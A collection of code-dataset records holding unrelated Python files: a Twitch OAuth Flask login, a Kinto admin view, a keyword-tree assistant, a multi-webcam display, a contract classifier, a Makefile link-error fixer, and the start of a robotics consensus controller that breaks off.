session=load_session(include_url=False), special_user=user_name, remember_me=remember_me)\n\t\t\t\tfrom www import botinteract\n\t\t\t\tbotinteract.set_data([\"twitch_oauth\", user_name], access_token)\n\n\t\t\t# Store the user name into the session\n\t\t\t# Note: we DON'T store the access_token in the session, as the session contents\n\t\t\t# are user-visible (for the default Flask implementation) and the token needs\n\t\t\t# to be kept secret. 
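(For reference, the code-for-token exchange performed a few lines up boils down to a single urlencoded POST. The standalone sketch below uses placeholder credentials and runs outside the Flask handler; it is illustrative only.)

```python
# Standalone sketch of the OAuth code-for-token exchange; all values are placeholders.
import json
import urllib.parse
import urllib.request

params = urllib.parse.urlencode({
    'client_id': 'CLIENT_ID',
    'client_secret': 'CLIENT_SECRET',
    'grant_type': 'authorization_code',
    'redirect_uri': 'https://example.com/login',
    'code': 'CODE_FROM_CALLBACK',
}).encode()
with urllib.request.urlopen('https://api.twitch.tv/kraken/oauth2/token', params) as resp:
    access_token = json.loads(resp.read().decode()).get('access_token')
```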
And we don't need it for anything other than verifying the\n\t\t\t# user name anyway, for non-special users.\n\t\t\tflask.session['user'] = user_name\n\t\t\tflask.session.permanent = remember_me\n\n\t\t\treturn_to = flask.session.pop('login_return_to', None)\n\t\t\treturn flask.render_template(\"login_response.html\", success=True, return_to=return_to, session=load_session(include_url=False))\n\t\texcept:\n\t\t\tserver.app.logger.exception(\"Exception in login\")\n\t\t\treturn flask.render_template(\"login_response.html\", success=False, session=load_session(include_url=False))\n\n@server.app.route('/logout')\ndef logout():\n\tif 'user' in flask.session:\n\t\tdel flask.session['user']\n\tsession = load_session(include_url=False)\n\treturn flask.render_template(\"logout.html\", return_to=flask.request.values.get('return_to'), session=session)\n","sub_path":"www/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102085970","text":"import os\n\nfrom kinto.core.decorators import cache_forever\n\nHERE = os.path.dirname(__file__)\n\n\n# Configured home page\n@cache_forever\ndef admin_home_view(request):\n try:\n with open(os.path.join(HERE, 'build/index.html')) as f:\n page_content = f.read()\n except FileNotFoundError: # pragma: no cover\n with open(os.path.join(HERE, 'public/help.html')) as f:\n page_content = f.read()\n return page_content\n","sub_path":"kinto/plugins/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"540963367","text":"\"\"\"\nTommy virtual assistant core module\n\"\"\"\nimport hashlib, json\nfrom config.settings import LOAD_MODULES, TOMMY_ROOT, LANG\nfrom tommy.core.tprotocol import TResponse\n\n\nclass Tommy:\n\t\"\"\"\n\tTommy class\n\tTommy virtual assistant is an instance of this class\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tConstruct the tommy's keywords tree\n\t\t\"\"\"\n\t\tself.tree = Node(None)\n\n\t\tfor module in LOAD_MODULES:\n\t\t\twith open(TOMMY_ROOT + 'modules/{}/keywords/keywords_{}.json'.format(module, LANG)) as keywords_file:\n\t\t\t\tkeywords_json = json.load(keywords_file)\n\n\t\t\tfor method, content in keywords_json.items():\n\t\t\t\tfor call in content['calls']:\n\t\t\t\t\tcurrent_node = self.tree\n\t\t\t\t\tfor keyword in call['keywords']:\n\t\t\t\t\t\tif keyword == '%p':\n\t\t\t\t\t\t\tcurrent_node.add_child(Node(\"%p\", is_variable=True))\n\t\t\t\t\t\t\tcurrent_node = current_node.get_child(\"%p\")\n\t\t\t\t\t\telif current_node.has_child(keyword):\n\t\t\t\t\t\t\tcurrent_node = current_node.get_child(keyword)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcurrent_node.add_child(Node(keyword))\n\t\t\t\t\t\t\tcurrent_node = current_node.get_child(keyword)\n\t\t\t\t\tcurrent_node.module = module\n\t\t\t\t\tcurrent_node.method = method\n\t\t\t\t\tcurrent_node.is_callable = True\n\n\tdef process(self, trequest):\n\t\t\"\"\"\n\t\tFind the correct module and method to call from a trequest\n\t\t:param trequest: TRequest sended by user\n\t\t:type trequest: TRequest\n\t\t\"\"\"\n\t\tkeywords = trequest.splited_text\n\t\tcurrent_node = self.tree\n\n\t\tin_variable = False\n\t\tfor keyword in keywords:\n\t\t\tif current_node.has_child(keyword):\n\t\t\t\tcurrent_node = current_node.get_child(keyword)\n\t\t\t\tin_variable = False\n\t\t\telse:\n\t\t\t\tif 
in_variable:\n\t\t\t\t\tnext\n\t\t\t\telse:\n\t\t\t\t\tif current_node.has_child(\"%p\"):\n\t\t\t\t\t\tcurrent_node = current_node.get_child(\"%p\")\n\t\t\t\t\t\tin_variable = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tbreak\n\n\t\tif current_node.is_callable:\n\t\t\tmodule = __import__('modules.{}.core'.format(current_node.module),\n\t\t\t\t\t\t\t\tfromlist=[None]) # I don't understant that fromlist\n\t\t\tmethod = getattr(module.Core(), current_node.method)\n\t\t\ttresponse = method(keywords)\n\t\t\ttresponse.trequest = trequest\n\t\t\treturn tresponse\n\t\telse:\n\t\t\treturn TResponse(\"Sorry I don't understand\", trequest)\n\n\nclass Node:\n\t\"\"\"\n\tA node of the Tommy keywords tree\n\t\"\"\"\n\n\tdef __init__(self, word, *childs, is_variable=False, is_callable=False, module=None, method=None):\n\t\t\"\"\"\n\t\tCreate a node, set the word associated and the child nodes\n\t\t:param word: The word represented by the node\n\t\t:param childs: Child nodes (list of another nodes)\n\t\t\"\"\"\n\t\tself.word = word\n\t\tif word:\n\t\t\tself.fingerprint = hashlib.sha1(str.encode(self.word)).hexdigest()\n\t\tself.childs = list(childs)\n\t\tself.is_variable = is_variable\n\t\tself.is_callable = is_callable\n\t\tself.module = module\n\t\tself.method = method\n\n\tdef has_childs(self):\n\t\t\"True if current node has childs\"\n\t\treturn len(self.childs) > 0\n\n\tdef has_child(self, word):\n\t\t\"\"\"True if the node has a child associated with word\"\"\"\n\t\tfor child in self.childs:\n\t\t\tif child.word == word: return True\n\t\treturn False\n\n\tdef get_child(self, word):\n\t\t\"\"\"Get a node's child using a word\"\"\"\n\t\tfor child in self.childs:\n\t\t\tif child.word == word: return child\n\t\treturn None\n\n\tdef add_child(self, child):\n\t\t\"\"\"Add a child to the current node\"\"\"\n\t\tself.childs.append(child)","sub_path":"tommy/core/tommy.py","file_name":"tommy.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"71842730","text":"from webcamvideostream import WebcamVideoStream\nimport os\nimport time\nimport operator\nimport imutils\n\nimport cv2\nimport numpy as np\n\nCOPYMAIN = True\n\nDISPLAY_INFO = False\nDISPLAY_GRID = False\nDISPLAY_MASK = True\nDISPLAY_FREG = False\n\nif COPYMAIN:\n # Copy values from the main program\n from run_LSTM_track import CAMERA\n from run_LSTM_track import ROTATE\n from run_LSTM_track import PMASK\n from run_LSTM_track import FREG\n from run_LSTM_track import FCAMCP\n from run_LSTM_track import FCAMDS\n from run_LSTM_track import FCOFF\nelse:\n # CAMERA = [0, 1, 2, 3]\n CAMERA = [cv2.CAP_DSHOW + 1] # Using directshow to fix black bar\n # CAMERA = [ \"rtsp://167.205.66.147:554/onvif1\"\n # \"rtsp://167.205.66.148:554/onvif1\",\n # \"rtsp://167.205.66.149:554/onvif1\",\n # \"rtsp://167.205.66.150:554/onvif1\"]\n\n PMASK = [ np.array([[290,200],[0,0],[430,0],[327,157]], np.int32), # NE\n np.array([[760,200],[880,288],[1024,134],[985,44]], np.int32), # NW\n np.array([[185,430],[255,470],[70,570],[0,575],[0,300]], np.int32), # SE\n np.array([[610,520],[770,430],[960,576],[660,576]], np.int32) # SW\n ] \n \n FREG = [288+0, 288+100, 512+125, 512+340] \n \nclass main_video:\n def preprocess(raws, rots):\n imgs = []\n for raw, rot in zip(raws, rots):\n img = raw\n # img = cv2.resize(img, dsize=(256, 144), interpolation=cv2.INTER_CUBIC) # 16:9\n img = cv2.resize(img, dsize=(512, 288), interpolation=cv2.INTER_CUBIC) # 16:9\n # img = cv2.resize(img, dsize=(320, 240), 
interpolation=cv2.INTER_CUBIC) # 4:3\n # img = cv2.resize(img, dsize=(160, 120), interpolation=cv2.INTER_CUBIC) # 4:3\n img = imutils.rotate_bound(img, rot)\n\n imgs.append(img)\n \n if len(imgs) == 1:\n image = imgs[0]\n if len(imgs) >= 2:\n image = np.hstack((imgs[0], imgs[1]))\n if len(imgs) >= 4: # Four images boxed\n image2 = np.hstack((imgs[2], imgs[3]))\n image = np.vstack((image, image2))\n \n return imgs, image\n \n def __init__(self, camera=CAMERA):\n fps_time = 0\n frame = 0\n avg_fps = 0\n his_fps = []\n \n # cams = [WebcamVideoStream(src=cam).start() for cam in camera]\n cams = [WebcamVideoStream(src=cam, resolution=(1280,720)).start() for cam in camera]\n \n # h, w, c = image_raw.shape\n # h2, w2, c2 = image2_raw.shape\n \n # print(h, w, c, h2, w2, c2)\n \n \n # Main loop\n while True:\n imgs = []\n \n for i, cam in enumerate(cams):\n img = cam.read()\n \n print(cam.grabbed, end=\" \")\n \n # If no image is acquired\n if (img is None):\n # Black image\n imgs.append(np.zeros((100,100,3), np.uint8))\n elif (img.size == 0):\n imgs.append(np.zeros((100,100,3), np.uint8))\n else:\n imgs.append(img)\n \n if(imgs is not [None]):\n imgs, image = main_video.preprocess(imgs, ROTATE)\n \n if len(imgs) == 5:\n im_h, im_w = imgs[4].shape[:2]\n imf = imgs[4][round(im_h*FCAMCP[0]): round(im_h*FCAMCP[1]), round(im_w*FCAMCP[2]): round(im_w*FCAMCP[3])] # Crop\n im_h, im_w = imf.shape[:2]\n imf = cv2.resize(imf, dsize=(round(im_w/FCAMDS), round(im_h/FCAMDS)), interpolation=cv2.INTER_CUBIC) # Downsample\n im_h, im_w = imf.shape[:2]\n ky = 0 if im_h % 2 == 0 else 1\n kx = 0 if im_w % 2 == 0 else 1\n freg = [round(FCOFF[1]-im_h/2), round(FCOFF[1]+im_h/2)+ky, round(FCOFF[0]-im_w/2), round(FCOFF[0]+im_w/2)+kx]\n \n image[freg[0]:freg[1], freg[2]:freg[3]] = imf # Insert to the center\n \n fps = 1.0 / (time.time() - fps_time)\n fps_time = time.time()\n \n print(\"%.2f\" % fps)\n his_fps.append(fps)\n \n frame += 1\n if frame > 120:\n avg_fps = sum(his_fps) / len(his_fps)\n frame = 0\n his_fps = []\n \n # self.display_all(image, fps)\n self.display_all(image, avg_fps)\n \n if cv2.waitKey(1) == 27:\n break\n else:\n print(\"Empty image\")\n time.sleep(.5)\n \n cv2.destroyAllWindows()\n \n def display_all(self, image, fps):\n \n h, w, c = image.shape\n print(w,h,c, end=\" \")\n \n if DISPLAY_MASK:\n for pmask in PMASK:\n cv2.fillPoly(image, [pmask], color=(0,0,0))\n \n if DISPLAY_FREG:\n cv2.rectangle(image, (FREG[2], FREG[0]), (FREG[3], FREG[1]), color=(64,64,64), thickness=1)\n \n if DISPLAY_INFO:\n cv2.putText(image,\n \"FPS: %f\" % fps,\n (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (0, 255, 0), 2)\n cv2.putText(image,\n \"RES: %dx%d\" % (w, h),\n (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (0, 255, 0), 2)\n \n if DISPLAY_GRID:\n grid_clr = (0, 255, 0)\n grid_thick = 1\n cv2.line(image, (0, round(h/4)), (w, round(h/4)), (0,255,0), 1)\n cv2.line(image, (0, round(h*3/4)), (w, round(h*3/4)), (0,255,0), 1)\n cv2.line(image, (round(w/4), 0), (round(w/4), h), (0,255,0), 1)\n cv2.line(image, (round(w*3/4), 0), (round(w*3/4), h), (0,255,0), 1)\n \n cv2.imshow('Bedssys', image)\n \nif __name__ == '__main__':\n main_video()\n\n","sub_path":"run_threads_stats.py","file_name":"run_threads_stats.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479235757","text":"import inout\nfrom classification import Classifier, Dataset, DatasetEntry\nfrom db import Dbinterface\nfrom db.models import Diario_Classificacao, 
Diario_Backlisted, Contrato, Predicao_Contrato\nfrom pln import Preprocessor\n\nimport numpy as np\nimport re\nfrom sqlalchemy import cast, Numeric\n\n\n##\n# utils\n\ndef remove_numbers(text):\n return re.sub(r'\\S*\\d\\S*', ' ', text)\n\n\n##\n# getting data\n\nappconfig = inout.read_yaml('./appconfig')\nstopwords = inout.read_json('./stopwords')\nclassifier_params = inout.read_json(appconfig['classification']['params_filepath'])\n\ndbi = Dbinterface(appconfig['db']['connectionstring'])\n\nprint('retrieving data')\nwith dbi.opensession() as session:\n\n blacklist = list(session.query(Diario_Backlisted.palavra))\n\n # get crowdsourced data\n training_dataset = session.query(Diario_Classificacao).filter(Diario_Classificacao.classe_id.in_(appconfig['classification']['allowed_classes']))\n training_dataset = Dataset([DatasetEntry(publicacao.id, remove_numbers(publicacao.corpo), publicacao.classe_id) for publicacao in training_dataset])\n\n # get data to predict\n contratos = session.query(Contrato).filter(cast(Contrato.ValorFirmado, Numeric(14,2)) > appconfig['classification']['min_value'])\n\n\nto_predict = [(contrato.id, contrato.objeto) for contrato in contratos]\nblacklist = stopwords + [entry[0] for entry in blacklist]\n\n\n##\n# preparing preprocessing and classification tools\n\nprep = Preprocessor()\n\n# preprocess my stopwords (blacklist). Scikit will remove stopwords AFTER the tokenization process (and i preprocess my tokens in the tokenization process)\n# source: https://github.com/scikit-learn/scikit-learn/blob/a24c8b46/sklearn/feature_extraction/text.py#L265\nblacklist = [prep.stem(prep.strip_accents(prep.lowercase(token))) for token in blacklist]\n\ndomain_params = {'vectorizer__tokenizer': prep.build_tokenizer(), 'classifier__random_state': appconfig['random_state']}\nclassifier = Classifier({**classifier_params, **domain_params}, blacklist)\n\n\n##\n# classifying\n\nprint('classifying contratos')\n\nclassifier.train(training_dataset.data, training_dataset.target)\n\nids, corpus = zip(*to_predict)\npredictions = classifier.predict(corpus)\nresults = zip(ids, predictions)\n\n\n##\n# persisting\n\nprint('persisting results')\nwith dbi.opensession() as session:\n\n # clean old entries\n session.query(Predicao_Contrato).delete()\n session.flush()\n\n # insert predicoes\n for result in results:\n predicao = Predicao_Contrato(id=result[0], classe=np.asscalar(result[1]))\n session.add(predicao)\n\n session.commit()\n","sub_path":"routine_predict_classes.py","file_name":"routine_predict_classes.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"333359399","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\n##########################################\n#\n# base on GNU make ver 4.1+\n#\n##########################################\n\nimport subprocess\nimport pymysql\nimport sys,re,os,getpass\n\n##########################################\n#\t- read_config\n#\n#\tread config file and get options\n#\t(Make version, language, verbose, keep_on, parsing message).\n#\n##########################################\ndef read_config():\n\tglobal verbose,keep_on,quiet\n\tglobal make_version,config\n\tglobal line_num_msg,symbol_msg,path_msg\n\tlanguage = \"eng\"\n\ttry:\n\t\tif config[0]=='~':\n\t\t\tconfig = os.path.expanduser('~')+config[1:]\n\t\tconfig_file = open(config,\"r\")\n\t\tlines = config_file.readlines()\n\t\tfor idx,line in enumerate(lines):\n\t\t\tif 
line.startswith(\"MAKE_VERSION=\"):\n\t\t\t\tmake_version = line[len(\"MAKE_VERSION=\"):].replace(\"\\n\",\"\")\n\t\t\telif line.startswith(\"MAKE_LANGUAGE=\"):\n\t\t\t\tif line[len(\"MAKE_LANGUAGE=\"):].lower().startswith(\"kor\"):\n\t\t\t\t\tlanguage = \"kor\"\n\t\t\telif line.startswith(\"KEEP_ON=\"):\n\t\t\t\tif line[len(\"KEEP_ON=\"):].lower().startswith(\"true\"):\n\t\t\t\t\tkeep_on = True\n\t\t\telif line.startswith(\"VERBOSE=\"):\n\t\t\t\tif line[len(\"VERBOSE=\"):].lower().startswith(\"false\"):\n\t\t\t\t\tverbose = False\n\t\t\telif line.startswith(\"[version {} - {}]\".format(make_version,language)):\n\t\t\t\tfor i in range(idx+1,idx+4):\n\t\t\t\t\tif lines[i].startswith(\"symbol: \"):\n\t\t\t\t\t\tsymbol_msg = lines[i].replace(\"\\n\",\"\")[len(\"symbol: \"):]\n\t\t\t\t\telif lines[i].startswith(\"line_num: \"):\n\t\t\t\t\t\tline_num_msg = lines[i].replace(\"\\n\",\"\")[len(\"line_num: \"):]\n\t\t\t\t\telif lines[i].startswith(\"path: \"):\n\t\t\t\t\t\tpath_msg = lines[i].replace(\"\\n\",\"\")[len(\"path: \"):]\n\t\t\t\tbreak\n\t\tconfig_file.close()\n\t\tif(not quiet):\n\t\t\tprint(\"[Makefile observer] [Make {} - {}] verbose:{}\".format(make_version,language,verbose))\n\t\t\tprint(\"[Makefile observer] config file: {}\".format(config))\n\texcept:\n\t\tif(not quiet):\n\t\t\tprint(\"[Makefile observer] The config file doesn't exist: '{}'\".format(config))\n\t\t\tprint(\"[Makefile observer] continue with default setting [make 4.1 - eng]\")\n\t\tsymbol_msg = \"undefined reference to `${symbol_name}'\"\n\t\tline_num_msg = \"Makefile:${line_num}: recipe for target '${target_name}' failed\"\n\t\tpath_msg = \"make[${num}]: Leaving directory '${path}'\"\n\n##########################################\n#\t- get_command funtion\n#\n#\tread command from consol and parse the command.\n#\tconfig path is the only command line option.\n##########################################\n\ndef get_command():\t\t\t\t\t#Basic command is 'make' and add options to cmd list\n\tglobal config,quiet\n\tstr = 'make --trace '\n\tif len(sys.argv) > 1:\t\t\t#make has options\n\t\tstr +=' '.join(sys.argv[1:])\n\t\t\n\tcmd = [s for s in str.split(' ') if s]\n\tfor i in range(0,len(cmd)):\t\t#check options\n\t\tif cmd[i].startswith(\"config=\"):\n\t\t\tconfig = cmd[i][7:]\n\t\t\tdel cmd[i]\n\t\telif cmd[i] == \"-Q\":\n\t\t\tquiet = True\n\t\t\tdel cmd[i]\n\treturn cmd\n\n##################################################\n#\t- find_error function\n#\n#\tparsing the output message of make\n#\tsave the error's details to struct 'error'\n#\n#\t'error' struct has elements below\n# \t\terror[\"error\"]:\t\tundefined reference\n#\t\terror[\"line\"]:\t\tthe line number of a Makefile error occured\n#\t\terror[\"path\"]:\t\tthe path of Makefile which has an error.\n#\t\terror[\"target\"]:\tthe name of a target error occurred\n#\t\terror[\"symbol\"]:\tthe name of a missing symbol\n#\t\terror[\"original_cmd\"]: \tthe command error occured\n##################################################\ndef find_error():\n\tglobal symbol_msg,line_num_msg,path_msg\n\terror = {}\n\tregex1 = re.compile(symbol_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${symbol_name}\",\"(.+)\"))\n\tregex2 = re.compile(line_num_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${line_num}\",\"(.+)\").replace(\"${target_name}\",\"(.+)\"))\n\tregex3 = 
re.compile(path_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${num}\",\"(.+)\").replace(\"${path}\",\"(.+)\"))\n\t\n\twith open(\"output.txt\",\"r\") as output_file:\n\t\tlines = output_file.readlines()\n\t\t\n\t\tfor i in range(len(lines)):\n\t\t\tresult = regex2.search(lines[i])\n\t\t\tif result:\n\t\t\t\terror[\"line\"] = int(result.group(1))\n\t\t\t\terror[\"target\"] = result.group(2)\n\t\t\t\terror[\"path\"] = \"\"\n\t\t\t\tfor j in range(i+1,len(lines)-1):\n\t\t\t\t\tresult = regex3.search(lines[j])\n\t\t\t\t\tif result:\n\t\t\t\t\t\terror[\"path\"] = result.group(2)\n\t\t\t\t\t\tbreak\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"[Makefile observer] cannot find error line number in Makefile\")\n\t\t\texit()\n\t\t\t\n\t\tfor i in range(len(lines)):\n\t\t\tresult = regex1.search(lines[i])\n\t\t\tif lines[i].startswith(\"Makefile:{}:\".format(error[\"line\"])):\n\t\t\t\tfor j in range(i,len(lines)):\n\t\t\t\t\tif lines[j].find(\"--as-needed\") != -1 and is_error(error[\"path\"],lines[j]):\n\t\t\t\t\t\terror[\"original_cmd\"] = lines[j].replace(\"\\n\",\"\")\n\t\t\t\t\t\terror[\"command\"] = lines[j].replace(\"\\n\",\"\")\n\t\t\t\t\t\tbreak\n\t\t\tif result:\n\t\t\t\terror[\"error\"] = 'undefined reference'\n\t\t\t\terror[\"symbol\"] = result.group(1)\n\t\t\t\terror[\"same\"] = []\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"[Makefile observer] cannot find undefined reference\")\n\t\t\texit()\n\treturn error\n\ndef is_error(path,command):\n\ttry:\n\t\tprint(path)\n\t\tsubprocess.check_call(\"cd {} && {}\".format(path,command),shell=True)\n\t\treturn False\n\texcept:\n\t\treturn True\n\n##################################################\n#\t- find_command_error function\n#\tsimilar to find error function.\n#\tbut this function find only the missing symbol's name.\n##################################################\ndef find_command_error(error):\n\tglobal symbol_msg\n\tregex = re.compile(symbol_msg.replace(\"*\",\"\\*\").replace(\"[\",\"\\[\").replace(\"]\",\"\\]\").replace(\"${symbol_name}\",\"(.+)\"))\n\twith open(\"output.txt\",\"r\") as output_file:\n\t\tlines = output_file.readlines()\n\t\tfor i in range(len(lines)):\n\t\t\tresult = regex.search(lines[i])\n\t\t\tif result:\n\t\t\t\terror[\"symbol\"] = result.group(1)\n\t\t\t\tbreak\n\treturn error\n\n#print the details of an error\ndef print_error(error):\t\n\tprint(\"\\n[Makefile observer] -------print error information-------\")\n\tprint(\"[Makefile observer] a undefined reference error occured\")\n\tif error[\"path\"]:\n\t\tprint(\"[Makefile observer] path:{}\".format(error[\"path\"]))\n\tprint(\"[Makefile observer] line[{}] of makefile\".format(error[\"line\"]))\n\tprint(\"[Makefile observer] Missing symbol: {}\".format(error[\"symbol\"]))\n\tprint(\"[Makefile observer] error command: {}\".format(error[\"original_cmd\"]))\n\tprint(\"[Makefile observer] fixed command: {}\".format(error[\"fixed_cmd\"]))\n\tprint(\"[Makefile observer] library order: {}\".format(error[\"lib_order\"]))\n\tprint(\"[Makefile observer] fixed order: {}\".format(error[\"fixed_lib_order\"]))\n\tfor same in error[\"same\"]:\n\t\tprint('[Makefile observer] symbol \"{}\" is found in {} libraries'.format(same[0],same[3]))\n\t\tprint('[Makefile observer] \"{}\" is selected (in {})'.format(same[1],same[2]))\n\n\t\n##################################################\n#\t- get_library function\n#\n#\tsearch the missing symbol from DB,\n#\treturn the name of the library\n##################################################\ndef 
get_library(error):\t\t\t## search missing symbol from DB\n\tusername = getpass.getuser();\n\tconn = pymysql.connect(host=\"localhost\", user=username, db=username+'_db', charset ='utf8')\n\tcur = conn.cursor()\n\n\tsql = 'select library_name,directory from for_symbol s, for_inotify i where s.symbol=\"{}\" and s.wd=i.wd;'.format(error[\"symbol\"])\n\tcur.execute(sql)\n\n\trows = cur.fetchall()\n\trowcount = cur.rowcount\n\n\tif rowcount > 0:\n\t\tif rowcount > 1:\n\t\t\terror[\"same\"].append([error[\"symbol\"],rows[0][0],rows[0][1],rowcount])\n\t\tcur.close()\n\t\tconn.close()\n\t\treturn \"-l\"+rows[0][0][3:rows[0][0].find(\".\")]\n\telse:\n\t\tprint(\"[Makefile observer] Can not find symbol {} from DB\".format(error[\"symbol\"]))\n\t\texit()\n\n##################################################\n#\t- fix_command function\n#\n#\tby parsing the error command\n#\tadd missing library and delete if it already included\n##################################################\ndef fix_command(error):\n\tlib = []\n\tbefore_lib_command = []\n\tafter_lib_command = []\n\n\ttry:\n\t\tcommand = error[\"command\"].strip().split(' ')\n\t\tidx = command.index(\"-Wl,--as-needed\")+1\n\texcept:\n\t\tprint(\"[Makefile observer] The error is not a 'as-needed' problem\")\n\t\tprint(\"[Makefile observer] This program cannot fix it.\")\n\t\texit()\n\n\tbefore_lib_command = command[:idx]\n\n\tfor option in command[idx:]:\n\t\tif option.startswith(\"-l\"):\n\t\t\tlib.append(option)\n\t\telse:\n\t\t\tafter_lib_command.append(option)\n\n\tif 'lib_order' not in error:\n\t\terror[\"lib_order\"] = ' '.join(lib)\n\tmissing_lib = get_library(error)\n\ttry:\t\t#if the missing library is already exist, the order is wrong. so delete it and add it at the end\n\t\tdel lib[lib.index(missing_lib)]\n\texcept:\n\t\tpass\n\t\n\tlib.append(missing_lib)\n\terror[\"fixed_lib_order\"] = ' '.join(lib)\n\tfixed_command = before_lib_command+lib+after_lib_command\n\treturn ' '.join(fixed_command)\n\n##################################################\n#\t-check_fixed function\n#\n#\tthe fix_Command funtion only add one library.\n#\tso if several libraries are excluded, we have to do fix_command several time.\n#\tthis function check whether the fixed command is really fixed\n##################################################\ndef check_fixed(fixed_command):\n\twith open(\"output.txt\",\"w\") as output_file:\n\t\ttry:\n\t\t\tsubprocess.check_call(fixed_command,stdout = output_file, stderr = output_file,shell=True)\n\t\t\treturn True\n\t\texcept:\n\t\t\treturn False\n\n##################################################\n#\t-fix_error function\n#\n#\tthis function fixes the error command and ask to the user\n#\twhether keep on making with fixed command or not\n##################################################\ndef fix_error(error):\n\tglobal quiet\n\tfixed_command = fix_command(error)\n\tmove_to_path = \"cd \"+error[\"path\"]+\" && \"\n\tfinal_command = fixed_command\n\tif error[\"path\"] != \"\":\n\t\tfinal_command = move_to_path+fixed_command\n\n\n\twhile not check_fixed(final_command):\n\t\terror = find_command_error(error)\n\t\terror[\"command\"] = fixed_command\n\t\tfixed_command = fix_command(error)\n\t\tif(error[\"command\"] == fixed_command):\n\t\t\tif(not quiet):\n\t\t\t\terror[\"fixed_cmd\"] = fixed_command\n\t\t\t\tprint_error(error)\n\t\t\tprint(\"\\n[Makefile observer] The fixed command also has an error.\")\n\t\t\tprint(\"[Makefile observer] Cannot fix the error.\")\n\t\t\texit()\n\n\t\tif error[\"path\"]:\n\t\t\tfinal_command = 
move_to_path+fixed_command\n\t\telse:\n\t\t\tfinal_command = fixed_command\n\n\terror[\"fixed_cmd\"] = fixed_command\n\tif(not quiet):\n\t\tprint_error(error)\n\n\tglobal keep_on\n\tif keep_on:\n\t\treturn True\n\telse:\n\t\ttry:\n\t\t\tanswer = raw_input(\"[Makefile observer] Keep make with fixed command? [Y/N]: \")\n\t\texcept:\n\t\t\tanswer = input(\"[Makefile observer] Keep make with fixed command? [Y/N]: \")\n\t\t\n\t\tif answer[0] == 'Y' or answer[0] == 'y':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n####################################################################################\n#\tmain function\n####################################################################################\n\n#default setting\nmake_version = \"4.1\"\nverbose = True\nkeep_on = False\nquiet = False\nconfig = \"~/deptools/symbol_config\"\ncmd = get_command()\nread_config()\n\nwhile True:\n\t#file for write error output.\n\ttry:\n\t\toutput_file=open(\"output.txt\",\"w\");\n\t\tproc=subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)\n\t\tfor line in proc.stdout:\n\t\t\toutput_file.write(line)\n\t\t\tif line.startswith(\"Makefile\") and line.find(\"due to\",11)!=-1:\n\t\t\t\tcontinue\n\t\t\telif line.startswith(\"printf\") or line.startswith(\"echo\"):\n\t\t\t\tcontinue\n\t\t\tif verbose:\n\t\t\t\tsys.stdout.write(line)\n\t\tproc.wait()\n\t\tif proc.returncode:\n\t\t\traise Exception(proc.returncode)\n\t\telse:\n\t\t\tprint(\"[Makefile observer] make complete!\")\n\t\t\tbreak\n\n\texcept Exception as e:\n\t\toutput_file.close()\n\t\tif(str(e) == \"2\"):\t\t\t#there is a error in Makefile\n\t\t\tif(not quiet):\n\t\t\t\tprint(\"[Makefile observer] Error in Makefile\")\n\t\t\terror = find_error()\n\t\t\tif error:\n\t\t\t\tif(fix_error(error)):\n\t\t\t\t\tif(not quiet):\n\t\t\t\t\t\tprint(\"[Makefile observer] Error is fixed. 
Continuing make.\\n\")\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tprint(\"[Makefile observer] Error is not fixed.\")\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"[Makefile observer] An error occurred, but it's not an undefined reference.\")\n\t\t\t\tprint(\"[Makefile observer] This program cannot fix it.\")\n\t\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"[Makefile observer] An unknown error occurred: {}\".format(str(e)))\n\t\t\tbreak\n","sub_path":"testdir/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":12199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"549635024","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom consensus_algorithm import ConsensusAlgorithm\n\nfrom assisipy import casu\n\nimport sys\nimport time\nfrom threading import Thread, Event\nfrom datetime import datetime\nfrom copy import deepcopy\nimport json\nimport csv\n\nclass ConsensusController(Thread):\n\n    def __init__(self, rtc_file, consensus, log=False):\n\n        Thread.__init__(self)\n\n        self.casu = casu.Casu(rtc_file,log=True)\n        nbg_ids = [int(name[-3:]) for name in self.casu._Casu__neighbors]\n        self.nbg_data_buffer = {}\n        for nb in nbg_ids:\n            self.nbg_data_buffer[nb] = []\n        self.consensus = deepcopy(consensus)\n\n        self.Td = 0.25 # Sample time for one consensus step, in seconds\n        self.t_prev = time.time()\n        self.stop_flag = Event()\n\n        # Bee density estimation variables\n        self.numbees = [0]\n        self.nb_buf_len = 5\n        self.ir_thresholds = [25000, 25000, 25000, 25000, 25000, 25000]\n\n        # Set up zeta logging\n        now_str = datetime.now().__str__().split('.')[0]\n        now_str = now_str.replace(' ','-').replace(':','-')\n        self.logfile = open(now_str + '-' + self.casu.name() + '-zeta.csv','wb')\n        self.logger = 